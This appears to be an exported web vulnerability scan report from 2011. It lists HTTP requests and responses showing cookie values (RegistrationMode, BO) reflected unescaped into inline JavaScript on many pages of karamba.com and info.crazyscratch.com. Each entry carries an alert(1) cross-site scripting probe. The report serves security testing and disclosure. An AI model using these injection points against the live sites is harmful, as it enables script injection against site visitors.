GET /UnderAge.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM75d3c" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54287 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM75d3c"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | / |
GET / HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/ Set-Cookie: BO=FM35a65"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44682 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM35a65"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | / |
GET / HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMa2d46" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44682 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMa2d46"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/ Set-Cookie: BO=FM5dfb5"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47573 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM5dfb5"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMeefdb" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47573 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMeefdb"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/ Set-Cookie: BO=FM95c72"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46999 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM95c72"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM39bc5" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46999 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM39bc5"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: BO=FM1f0ee"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM1f0ee"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMa8630" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMa8630"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Home.aspx |
GET /Home.aspx?LanguageCode Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/ Set-Cookie: BO=FMaf96d"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44699 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMaf96d"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Home.aspx |
GET /Home.aspx?LanguageCode Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM78021" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44699 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM78021"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/ Set-Cookie: BO=FMc76c1"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 57697 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMc76c1"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMf3610" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 57697 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMf3610"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/ Set-Cookie: BO=FM23b45"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54166 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM23b45"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM90883" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54166 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM90883"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Privacy.aspx |
GET /Privacy.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/ Set-Cookie: BO=FMa755d"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 56185 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMa755d"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Privacy.aspx |
GET /Privacy.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM2df76" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 56185 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM2df76"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/ Set-Cookie: BO=FM8f5d3"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM8f5d3"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMc1e15" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMc1e15"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/ Set-Cookie: BO=FM19edf"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM19edf"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Responsible.aspx |
